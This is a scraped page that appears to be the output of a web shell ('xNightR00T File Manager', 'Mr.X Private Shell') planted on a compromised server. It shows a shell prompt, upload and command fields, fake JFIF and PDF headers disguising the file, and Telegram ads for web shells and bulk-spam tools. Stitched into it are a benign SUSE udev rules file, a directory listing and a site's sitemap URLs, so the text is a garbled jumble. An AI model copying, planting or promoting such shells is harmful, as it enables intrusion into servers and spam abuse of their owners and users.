xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# Do not edit this file, it will be overwritten on update.

# This file contains *depecrated* rules kept only for backward
# compatibility reasons. Indeed upstream has the bad habit to change
# symlink naming schemes hence breaking systems using the old schemes.
#
# If your system uses one of the symlinks generated by these compat
# rules (usually in /etc/fstab), we encourage you to replace the
# relevant paths with the new ones (symlinks generated by
# 60-persistent-storage.rules).
#
# You might check if your system relies on one of those compat symlinks
# by disabling their creation at boot time. To do so, append
# "udev.compat_symlink_generation=0" to the kernel command line. If
# your system works flawlessly, there's a good chance that your system
# doesn't rely on them and they could be disabled permanently.
#
# Thanks !
#
# Note: this rules file can rely on all ID_* variables (set by
# 60-persistent-storage.rule) but should not overwrite them, see
# bsc#1048679 for details.

ACTION=="remove", GOTO="persistent_storage_end"

SUBSYSTEM!="block", GOTO="persistent_storage_end"
KERNEL!="nvme*|sd*", GOTO="persistent_storage_end"

# ignore partitions that span the entire disk
TEST=="whole_disk", GOTO="persistent_storage_end"

#
# The compat symlink generation number can be specified through the kernel
# command line and in that case it will take precedence.
#
# Note: any non-supported values (including "0") will disable all generations
# whereas no values specified will be equivalent to a value "1" and therefore
# will request the creation of all compat symlinks (whatever their age).
#
IMPORT{cmdline}="udev.compat_symlink_generation"
ENV{COMPAT_SYMLINK_GENERATION}="$env{udev.compat_symlink_generation}"

#
# Systems without the compat-symlinks-generation file are systems
# installed before compat rules were created. They might be using
# one of those compat symlinks (can be any generation).
#
ENV{COMPAT_SYMLINK_GENERATION}!="?*", IMPORT{file}="/usr/lib/udev/compat-symlink-generation"
ENV{COMPAT_SYMLINK_GENERATION}!="?*", ENV{COMPAT_SYMLINK_GENERATION}="1"

#
# Generation #1
#
ENV{COMPAT_SYMLINK_GENERATION}!="1", GOTO="generation_2"

# NVMe symlinks were introduced by a SUSE specific commit (bsc#944132) which
# relied on scsi_id (unfortunately) and hence used the NVMe SCSI translation
# layer. Later upstream added (by-id) symlinks for NVMe as well but reads the
# device properties from its sysfs attributes instead. The symlinks names
# generated in both cases are not identical so we still have to generate the
# old ones for backward compatibly reasons.
#
# The SCSI translation layer for NVMe devices has been removed from the kernel
# since 4.13, therefore we had to drop the use of scsi_id and use the sysfs
# interface to mimic scsi_id and continue to generate the old compat symlinks.
#
# The rules below hopefully mimics the main cases only as it's impossible to
# re-implement the exact behavior of scsi_id via udev rules.
#
# scsi_id acted differently depending on the NVMe revision implemented by a
# device, which can lead to problems if the device firmware is
# updated. Therefore symlinks for all NVMe revisions are generated now.
#
# Extra care is needed for whitespace handling. For example we can't use
# %s{model} to retrieve the model string because udev strips any trailing
# whitespaces and some plateforms (QEMU does that) might append such chars. In
# those cases scsi_id was replacing them with a single trailing '_'. Therefore
# the currently code retrieves the model string manually making sure to
# preserve all characters so trailing whitespaces are still converted when the
# symlink is created.

KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_NVME_EUI_COMPAT}!="?*", ATTRS{eui}=="?*", ATTRS{eui}!="0000000000000000", \
  PROGRAM=="/bin/sh -c 'eui=\"%s{eui}\"; echo ${eui// /}", ENV{ID_NVME_EUI_COMPAT}="2%c"

KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_NVME_NGUID_COMPAT}!="?*", ATTRS{nguid}=="?*", \
  PROGRAM=="/bin/sh -c 'nguid=\"%s{nguid}\"; echo ${nguid//-/}", ENV{ID_NVME_NGUID_COMPAT}="%c"

KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_NVME_SERIAL_COMPAT}!="?*", ATTRS{model}=="?*", ATTRS{serial}=="?*", \
  PROGRAM=="/bin/sh -c ' \
    cd /sys/%p; \
    while ! [ -f model ]; do \
      cd ..; \
      [ $(pwd) = %S ] && exit 1; \
   done; \
   cut -c 1-16 model'", ENV{ID_NVME_SERIAL_COMPAT}="SNVMe_%c%s{serial}"

KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_NVME_EUI_COMPAT}=="?*", SYMLINK+="disk/by-id/nvme-$env{ID_NVME_EUI_COMPAT}"
KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_NVME_NGUID_COMPAT}=="?*", SYMLINK+="disk/by-id/nvme-$env{ID_NVME_NGUID_COMPAT}"
KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_NVME_SERIAL_COMPAT}=="?*", SYMLINK+="disk/by-id/nvme-$env{ID_NVME_SERIAL_COMPAT}"

KERNEL=="nvme*", ENV{DEVTYPE}=="partition", ENV{ID_NVME_EUI_COMPAT}=="?*", SYMLINK+="disk/by-id/nvme-$env{ID_NVME_EUI_COMPAT}-part%n"
KERNEL=="nvme*", ENV{DEVTYPE}=="partition", ENV{ID_NVME_NGUID_COMPAT}=="?*", SYMLINK+="disk/by-id/nvme-$env{ID_NVME_NGUID_COMPAT}-part%n"
KERNEL=="nvme*", ENV{DEVTYPE}=="partition", ENV{ID_NVME_SERIAL_COMPAT}=="?*", SYMLINK+="disk/by-id/nvme-$env{ID_NVME_SERIAL_COMPAT}-part%n"

# Leap 42.3 ISO has a version of udev which suffers from bsc#1048679
# (ID_SERIAL is set by the upstream rules making ID_BUS empty instead
# of "nvme"). This lead to those odd symlinks with the "nvme" prefix
# missing (bsc#1063249).
#
# They are actually only used by systems with Leap 42.3 initially
# installed and with NVMe encrypted partitions.
KERNEL=="nvme*", ENV{DEVTYPE}=="disk", ENV{ID_SERIAL}=="?*", SYMLINK+="disk/by-id/-$env{ID_SERIAL}"
KERNEL=="nvme*", ENV{DEVTYPE}=="partition", ENV{ID_SERIAL}=="?*", SYMLINK+="disk/by-id/-$env{ID_SERIAL}-part%n"

# SCSI compat links for ATA devices, removed by f6ba1a468cea (boo#769002)
KERNEL=="sd*[!0-9]", ENV{ID_BUS}=="ata", PROGRAM=="scsi_id --whitelisted --replace-whitespace -p0x80 -d $devnode", RESULT=="?*", ENV{ID_SCSI_COMPAT}="$result", SYMLINK+="disk/by-id/scsi-$env{ID_SCSI_COMPAT}"
KERNEL=="sd*[0-9]", ENV{ID_SCSI_COMPAT}=="?*", SYMLINK+="disk/by-id/scsi-$env{ID_SCSI_COMPAT}-part%n"

# by-path (parent device path, compat version, only for ATA/NVMe/SAS bus) (bnc#916420)
ENV{DEVTYPE}=="disk", ENV{ID_BUS}=="ata|nvme|scsi", DEVPATH!="*/virtual/*", IMPORT{program}="path_id_compat --compat=1 %p"
ENV{DEVTYPE}=="disk", ENV{ID_PATH_COMPAT1}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH_COMPAT1}"
ENV{DEVTYPE}=="partition", ENV{ID_PATH_COMPAT1}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH_COMPAT1}-part%n"

# This restores the symlinks for SAS disks removed by 66bba0e701b95dc42e (bsc#1040153)
ENV{DEVTYPE}=="disk", ENV{ID_BUS}=="ata|nvme|scsi", DEVPATH!="*/virtual/*", IMPORT{program}="path_id_compat --compat=2 %p"
ENV{DEVTYPE}=="disk", ENV{ID_PATH_COMPAT2}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH_COMPAT2}"
ENV{DEVTYPE}=="partition", ENV{ID_PATH_COMPAT2}=="?*", SYMLINK+="disk/by-path/$env{ID_PATH_COMPAT2}-part%n"

# scsi compat links for ATA devices (for compatibility with udev < 184) (bnc#886852)
KERNEL=="sd*[!0-9]", ENV{ID_BUS}=="ata", PROGRAM=="scsi_id --truncated-serial --whitelisted --replace-whitespace -p0x80 -d$tempnode", RESULT=="?*", ENV{ID_SCSI_COMPAT_TRUNCATED}="$result", SYMLINK+="disk/by-id/scsi-$env{ID_SCSI_COMPAT_TRUNCATED}"
KERNEL=="sd*[0-9]", ENV{ID_SCSI_COMPAT_TRUNCATED}=="?*", SYMLINK+="disk/by-id/scsi-$env{ID_SCSI_COMPAT_TRUNCATED}-part%n"

#
# Generation #2
#
LABEL="generation_2"
ENV{COMPAT_SYMLINK_GENERATION}!="1|2", GOTO="persistent_storage_end"

# Currently no compat links of generation 2

LABEL="persistent_storage_end"

Filemanager

Name Type Size Permission Actions
00-dont-del-part-nodes.rules File 572 B 0644
01-md-raid-creating.rules File 321 B 0644
10-dm.rules File 7.08 KB 0444
11-dm-lvm.rules File 2.39 KB 0444
11-dm-mpath.rules File 4.43 KB 0644
11-dm-parts.rules File 1.41 KB 0644
13-dm-disk.rules File 1.75 KB 0444
40-libgphoto2.rules File 4.63 KB 0644
50-iscsi-firmware-login.rules File 594 B 0644
50-udev-default.rules File 3.26 KB 0644
55-scsi-sg3_id.rules File 4.67 KB 0644
56-multipath.rules File 4.06 KB 0644
58-scsi-sg3_symlink.rules File 2.82 KB 0644
59-fc-wwpn-id.rules File 624 B 0644
59-scsi-cciss_id.rules File 732 B 0644
60-block.rules File 612 B 0644
60-cdrom_id.rules File 1.38 KB 0644
60-drm.rules File 153 B 0644
60-evdev.rules File 738 B 0644
60-openct.rules File 8.17 KB 0644
60-persistent-alsa.rules File 616 B 0644
60-persistent-input.rules File 2.41 KB 0644
60-persistent-storage-tape.rules File 1.39 KB 0644
60-persistent-storage.rules File 6.22 KB 0644
60-persistent-v4l.rules File 769 B 0644
60-serial.rules File 1.16 KB 0644
60-ssd-scheduler.rules File 329 B 0644
61-persistent-storage-compat.rules File 7.42 KB 0644
63-md-raid-arrays.rules File 2.1 KB 0644
64-btrfs-dm.rules File 387 B 0644
64-btrfs.rules File 616 B 0644
64-md-raid-assembly.rules File 1.41 KB 0644
65-context.rules File 1.61 KB 0644
66-kpartx.rules File 1.47 KB 0644
67-kpartx-compat.rules File 839 B 0644
68-del-part-nodes.rules File 1.12 KB 0644
69-dm-lvm-metad.rules File 6.06 KB 0444
69-libmtp.rules File 98.25 KB 0644
69-md-clustered-confirm-device.rules File 846 B 0644
70-kdump.rules File 404 B 0644
70-mouse.rules File 734 B 0644
70-power-switch.rules File 942 B 0644
70-uaccess.rules File 2.53 KB 0644
71-seat.rules File 2.65 KB 0644
73-seat-late.rules File 596 B 0644
75-net-description.rules File 452 B 0644
75-persistent-net-generator.rules File 5.46 KB 0644
75-probe_mtd.rules File 174 B 0644
78-sound-card.rules File 4.4 KB 0644
80-acpi-container-hotplug.rules File 662 B 0644
80-drivers.rules File 615 B 0644
80-hotplug-cpu-mem.rules File 914 B 0644
80-net-setup-link.rules File 292 B 0644
80-qemu-ga.rules File 158 B 0644
80-udisks2.rules File 7.8 KB 0644
81-mptctl.rules File 166 B 0644
85-regulatory.rules File 225 B 0644
85-usb_autosuspend_devices.rules File 841 B 0755
85-usb_elotouch_wakeup.rules File 224 B 0755
90-haveged.rules File 107 B 0644
90-hwrng.rules File 172 B 0644
90-vconsole.rules File 441 B 0644
95-dm-notify.rules File 479 B 0444
99-iwlwifi-led.rules File 97 B 0644
99-systemd.rules File 4.04 KB 0644
99-vmware-scsi-udev.rules File 459 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml